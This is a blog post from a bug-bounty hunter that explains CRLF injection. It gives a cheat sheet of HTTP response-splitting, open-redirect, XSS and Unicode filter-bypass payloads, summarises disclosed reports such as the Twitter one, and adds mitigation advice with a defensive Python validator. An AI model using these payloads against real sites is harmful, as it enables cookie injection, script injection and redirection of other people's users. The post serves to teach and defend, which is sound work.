CRLF Injection Playbook

Aditya Soni
Jan 12

Hello Guys,
Just a rough analysis of publicly disclosed bugs about CRLF injection.

This analysis was done purely out of curiosity about learning new things, and since I found the topic interesting, I thought of sharing it with you guys.
I started by reading disclosed reports about CRLF injection on HackerOne Hacktivity. (Some interesting reports are discussed below.)

Getting Started

Now, What is CRLF?

Line feed = \n (%0a)
Carriage Return = \r (%0d)

Basically, pressing the Enter key is represented as the combination of a carriage return and a line feed.

Windows editors mostly use the combination \r\n.
Unix mostly uses \n.

Diggin’ into Injection and Attack Vector

What is CRLF Injection?

A Carriage Return Line Feed (CRLF) injection vulnerability occurs when an application does not sanitize user input correctly and allows carriage returns and line feeds to be inserted. For many internet protocols, including HTTP, these characters denote line breaks and therefore have special significance.
For example, parsing of an HTTP message relies on CRLF characters (%0D%0A, which decodes to \r\n) to identify the sections of the message, including the headers.
Reference:

CRLF injection can also lead to HTTP request smuggling and HTTP response splitting. (Detailing them is out of the scope of this blog; maybe I will discuss them in the next post.)


Starting The Research

I started with HackerOne Hacktivity and searched for CRLF injection, which gave me "only" 59 results.

That doesn't mean there are only 59 publicly disclosed reports on CRLF injection.
Then I asked my best friend (Google) about CRLF injection reports. It gave me 80 results about CRLF.

And after some time my browser was filled with CRLF injection reports.

In all the reports above, I found that CRLF injection is most commonly performed by modifying an HTTP parameter or the URL.

Going through all the reports and write-ups, I created a cheat sheet for CRLF injection, which is as follows:

CHEATSHEET

1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue
2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test

These encoded values are the UTF-8 forms of the Unicode characters U+560A, U+560D, U+563E and U+563C. They pass a filter that only looks for the literal bytes %0A, %0D, %3E and %3C, yet the low byte of each code point is exactly the control character, so a back end that narrows characters to single bytes turns them back into \n, \r, > and <. This is what happened in the Twitter report discussed below.

Result And Analysis

Most CRLF injections can be chained into XSS or open redirects, which increases the criticality of the report; a properly chained finding can easily be escalated to a Medium CVSS score.

Mitigation or Fix Implementation

A simple fix for CRLF injection is to reject or strip CR and LF characters from user input before it is placed into a header, or to encode the value so that CRLF sequences cannot enter the header. The check has to run on the fully decoded value: a check on the raw, still percent-encoded URL is exactly what the encoded and filter-bypass forms in the cheat sheet above get past.
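The following is an added example, not code from the original post or from any of the reports it discusses. It ties together the parsing point from the "What is CRLF Injection?" section, the filter-bypass entries of the cheat sheet, and the fix described just above: a header-value validator, a naive response builder beside a strict one, and a lenient header parser that shows how many headers a client actually sees. The `narrow_to_bytes` function is an assumed model of a lossy back end that writes each character as its low byte (the behaviour the %E5%98%8A payload depends on); the endpoint, the `/home` redirect target and the function names are all constructed for the illustration.

```python
# Added example (not from the original post): a header-value check against
# CRLF injection, and a small model of why the check is needed.
import urllib.parse

# Characters that must never appear in an HTTP header value.
FORBIDDEN = {"\r", "\n", "\x00"}


def percent_decode(raw: str) -> str:
    """Percent-decode a URL fragment as UTF-8, the way a web stack does before
    the value reaches application code. %E5%98%8A therefore becomes U+560A."""
    return urllib.parse.unquote(raw, encoding="utf-8", errors="strict")


def narrow_to_bytes(text: str) -> bytes:
    """Assumed model of a lossy back end that emits each character as its low
    byte. U+560A becomes 0x0A (LF) and U+560D becomes 0x0D (CR), which is the
    property the %E5%98%8A / %E5%98%8D payloads rely on. ASCII is unchanged."""
    return bytes(ord(ch) & 0xFF for ch in text)


def validate_header_value(value: str) -> str:
    """Return the value if it is safe to place in a header, else raise.

    Rejects literal CR/LF/NUL and any non-ASCII character whose low byte is
    one of them, so the check still holds if a later layer narrows characters.
    """
    for ch in value:
        if ch in FORBIDDEN:
            raise ValueError(f"control character U+{ord(ch):04X} in header value")
        if ord(ch) > 0x7F and chr(ord(ch) & 0xFF) in FORBIDDEN:
            raise ValueError(f"U+{ord(ch):04X} would narrow to a line break")
    return value


def build_response(headers, strict: bool) -> bytes:
    """Serialise a 302 response. With strict=True every value is validated;
    with strict=False the value is written as-is (the vulnerable pattern)."""
    lines = ["HTTP/1.1 302 Found"]
    for name, value in headers:
        if strict:
            value = validate_header_value(value)
        lines.append(f"{name}: {value}")
    return narrow_to_bytes("\r\n".join(lines) + "\r\n\r\n")


def header_names(response: bytes) -> list:
    """Header names as a lenient client sees them. Like most real parsers
    (RFC 7230 section 3.5), a bare LF is accepted as a line terminator and a
    stray CR is ignored."""
    head = response.replace(b"\r\n", b"\n").partition(b"\n\n")[0]
    names = []
    for line in head.split(b"\n")[1:]:  # skip the status line
        line = line.strip(b"\r")
        if b":" in line:
            names.append(line.split(b":", 1)[0].decode("latin-1"))
    return names


def demo(payload: str, strict: bool) -> list:
    """Constructed redirect endpoint: the decoded payload is appended to the
    Location value, as an unvalidated 'next' parameter would be."""
    headers = [("Location", "/home" + percent_decode(payload))]
    return header_names(build_response(headers, strict))


if __name__ == "__main__":
    # Both payloads are taken from the cheat sheet above.
    for p in ("%0D%0ASet-Cookie:mycookie=myvalue",
              "%E5%98%8A%E5%98%8DSet-Cookie:%20test"):
        print(p, "-> naive:", demo(p, strict=False))  # an extra Set-Cookie appears
        try:
            demo(p, strict=True)
        except ValueError as exc:
            print(p, "-> strict: rejected,", exc)
```

Run stand-alone, the naive path shows a second `Set-Cookie` header for both payloads, including the one a filter on literal %0D%0A would have passed, while the strict path refuses both before anything is written. The validator deliberately rejects rather than strips: silently removing characters can leave an attacker-controlled value that looks clean but differs from what the caller intended, whereas a rejected request is visible in logs and easy to alert on.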

This was all about the attack vector and my research on CRLF injection. Now let's look at some publicly available payloads and discuss some interesting reports.


Payloads

Interesting Reports

1. Twitter HTTP Response Splitting

In April 2015, filedescriptor reported this vulnerability to Twitter. It allowed an attacker to set an arbitrary cookie by tacking additional information onto an HTTP request.
He was able to pass in %E5%98%8A%E5%98%8DSet-Cookie:%20test, which resulted in %0A and %0D being included in the cookie header and led to Twitter sending Set-Cookie: test back to him.

Conclusion:
When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input.

2. HTTP Response Splitting (CRLF injection) due to headers overflow

For the details of this report, filedescriptor himself has published a blog post.

3. v.shopify.com Response Splitting


THE END

During this process I definitely learned new things, and now I feel I have much more knowledge about CRLF injection than before and a good intuition for finding new vulnerabilities.

So, Until Next Blog

Best of luck everyone. Keep-Hacking!

Feedback and edits are welcome.
